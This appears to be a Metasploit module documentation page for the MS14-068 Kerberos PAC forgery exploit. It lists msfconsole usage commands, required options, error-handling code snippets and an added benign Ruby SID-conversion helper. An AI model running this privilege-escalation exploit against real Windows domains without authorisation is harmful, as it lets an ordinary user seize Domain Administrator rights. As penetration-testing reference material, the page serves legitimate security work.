MS14-068 Microsoft Kerberos Checksum Validation Vulnerability - Metasploit
This page contains detailed information about how to use the auxiliary/admin/kerberos/ms14_068_kerberos_checksum metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Source code: modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
Disclosure date: 2014-11-18
Last modification time: 2022-04-08 11:35:31 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 88
List of CVEs: CVE-2014-6324
This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS request, where a domain user may forge a PAC with arbitrary privileges, including Domain Administrator. This module requests a TGT with a forged PAC and exports it to an MIT Kerberos credential cache file, which can be loaded on Windows systems with the help of Mimikatz. It has been tested successfully on Windows 2008.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show targets
... a list of targets ...
msf auxiliary(ms14_068_kerberos_checksum) > set TARGET target-id
msf auxiliary(ms14_068_kerberos_checksum) > show options
... show and set options ...
msf auxiliary(ms14_068_kerberos_checksum) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
USER: The Domain User
PASSWORD: The Domain User password
DOMAIN: The Domain (upper case) Ex: DEMO.LOCAL
USER_SID: The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
Msfconsole Usage
Here is how the admin/kerberos/ms14_068_kerberos_checksum auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show info
Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-11-18
Provided by:
Tom Maddock
Sylvain Monne
juan vazquez <[email protected]>
Check supported:
No
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD                   yes       The Domain User password
RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT     88               yes       The target port
Timeout   10               yes       The TCP timeout to establish connection and read data
USER                       yes       The Domain User
USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
Description:
This module exploits a vulnerability in the Microsoft Kerberos
implementation. The problem exists in the verification of the
Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
where a domain user may forge a PAC with arbitrary privileges,
including Domain Administrator. This module requests a TGT ticket
with a forged PAC and exports it to a MIT Kerberos Credential Cache
file. It can be loaded on Windows systems with the Mimikatz help. It
has been tested successfully on Windows 2008.
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-6324
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/MS14-068
OSVDB (114751)
http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
https://github.com/bidord/pykek
https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
Module Options
This is a complete list of options available in the admin/kerberos/ms14_068_kerberos_checksum auxiliary module:
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show options
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD                   yes       The Domain User password
RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT     88               yes       The target port
Timeout   10               yes       The TCP timeout to establish connection and read data
USER                       yes       The Domain User
USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
Advanced Options
Here is a complete list of advanced options supported by the admin/kerberos/ms14_068_kerberos_checksum auxiliary module:
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show advanced
Module advanced options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
VERBOSE    false            no        Enable detailed status messages
WORKSPACE                   no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/kerberos/ms14_068_kerberos_checksum module can do:
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/kerberos/ms14_068_kerberos_checksum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check the code snippets below, taken from the module source code, for the possible causes of each message; this often helps in identifying the root cause of the problem.
Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
Here is a relevant code snippet related to the "Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000" error message:
def run
  print_status("Validating options...")

  unless datastore['USER_SID'] =~ /^S-(\d+-){6}\d+$/
    print_error("Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000")
    return
  end

  domain = datastore['DOMAIN'].upcase
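The module rejects any USER_SID that does not have exactly seven dash-separated numbers after "S", i.e. the S-1-5-21-&lt;a&gt;-&lt;b&gt;-&lt;c&gt;-&lt;RID&gt; shape of a domain account SID, so well-known SIDs such as BUILTIN groups fail this check. The following helpers are an added example, not module code: they reuse the module's regex to pre-check a value, split it into domain SID and RID, and convert it to and from the binary SID layout (revision, sub-authority count, 6-byte big-endian identifier authority, little-endian sub-authorities) in which SIDs are carried inside a PAC. All sample SIDs are constructed.

```ruby
# Added example (not module code): check a USER_SID the way the module does and
# convert it to/from the binary SID layout used inside Kerberos PAC structures.
# The module's check: exactly seven dash-separated numbers after "S".
USER_SID_RE = /^S-(\d+-){6}\d+$/

def valid_user_sid?(sid)
  !!(sid =~ USER_SID_RE)
end

# Split a domain account SID into the domain SID and the account RID.
def split_sid(sid)
  parts = sid.split('-')
  { domain: parts[0..-2].join('-'), rid: parts[-1].to_i }
end

# String SID -> binary SID: revision (1 byte), sub-authority count (1 byte),
# identifier authority (6 bytes, big-endian), sub-authorities (4 bytes each, little-endian).
def sid_to_bin(sid)
  parts = sid.split('-')
  raise ArgumentError, "malformed SID: #{sid}" unless parts[0] == 'S' && parts.size >= 3
  revision  = parts[1].to_i
  authority = parts[2].to_i
  subs      = parts[3..-1].map(&:to_i)
  raise ArgumentError, 'too many sub-authorities' if subs.size > 15
  [revision, subs.size].pack('CC') +
    [authority >> 32, authority & 0xffffffff].pack('nN') +
    subs.pack('V*')
end

# Binary SID -> string SID (inverse of sid_to_bin).
def bin_to_sid(bin)
  revision, count = bin.unpack('CC')
  hi, lo = bin[2, 6].unpack('nN')
  subs = bin[8, 4 * count].unpack('V*')
  (['S', revision, (hi << 32) | lo] + subs).join('-')
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample values, not taken from any real domain.
  ['S-1-5-21-1755879683-3641577184-3486455962-1000', 'S-1-5-32-544'].each do |sid|
    puts "#{sid}: accepted by module check = #{valid_user_sid?(sid)}"
  end
  bin = sid_to_bin('S-1-5-21-1755879683-3641577184-3486455962-1000')
  puts "binary: #{bin.unpack1('H*')}  round trip: #{bin_to_sid(bin)}"
end
```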
<PEER> - Invalid AS-REP, aborting...
Here is a relevant code snippet related to the "<PEER> - Invalid AS-REP, aborting..." error message:
  pa_data: pre_auth
)

unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
  print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
  print_error("#{peer} - Invalid AS-REP, aborting...")
  return
end

print_status("#{peer} - Parsing AS-REP...")
<PEER> - Invalid TGS-REP, aborting...
Here is a relevant code snippet related to the "<PEER> - Invalid TGS-REP, aborting..." error message:
  subkey: sub_key
)

unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
  print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
  print_error("#{peer} - Invalid TGS-REP, aborting...")
  return
end

print_good("#{peer} - Valid TGS-Response, extracting credentials...")
<ERROR_INFO:0> - <ERROR_INFO:1>
Here is a relevant code snippet related to the "<ERROR_INFO:0> - <ERROR_INFO:1>" error message:
def warn_error(res)
  msg = ''

  if Rex::Proto::Kerberos::Model::ERROR_CODES.has_key?(res.error_code)
    error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
    msg = "#{error_info[0]} - #{error_info[1]}"
  else
    msg = 'Unknown error'
  end

  msg
Unknown error
Here is a relevant code snippet related to the "Unknown error" error message:

  if Rex::Proto::Kerberos::Model::ERROR_CODES.has_key?(res.error_code)
    error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
    msg = "#{error_info[0]} - #{error_info[1]}"
  else
    msg = 'Unknown error'
  end

  msg
end
end
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #12949 Merged Pull Request: This fixes broken links to the community.rapid7.com blog
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6086 Merged Pull Request: Fix Kerberos Client mixin Namespace
- #5123 Merged Pull Request: Fix spelling of Microsoft in module name
- #4495 Merged Pull Request: Minor grammar fixes on modules
- #4456 Merged Pull Request: Module for MS14-068, Kerberos Checksum (and krb protocol support)
References
- CVE-2014-6324
- MS14-068
- OSVDB (114751)
- http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
- https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
- https://github.com/bidord/pykek
- https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
See Also
Check also the following modules related to this module:
- auxiliary/gather/kerberos_enumusers
- post/multi/gather/unix_kerberos_tickets
- auxiliary/gather/ms14_052_xmldom
- exploit/windows/browser/ms14_012_cmarkup_uaf
- exploit/windows/browser/ms14_012_textrange
- exploit/windows/browser/ms14_064_ole_code_execution
- exploit/windows/fileformat/ms14_017_rtf
- exploit/windows/fileformat/ms14_060_sandworm
- exploit/windows/fileformat/ms14_064_packager_python
- exploit/windows/fileformat/ms14_064_packager_run_as_admin
- exploit/windows/local/ms14_009_ie_dfsvc
- exploit/windows/local/ms14_058_track_popup_menu
- exploit/windows/local/ms14_070_tcpip_ioctl
- exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684
Authors
- Tom Maddock
- Sylvain Monne
- juan vazquez
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.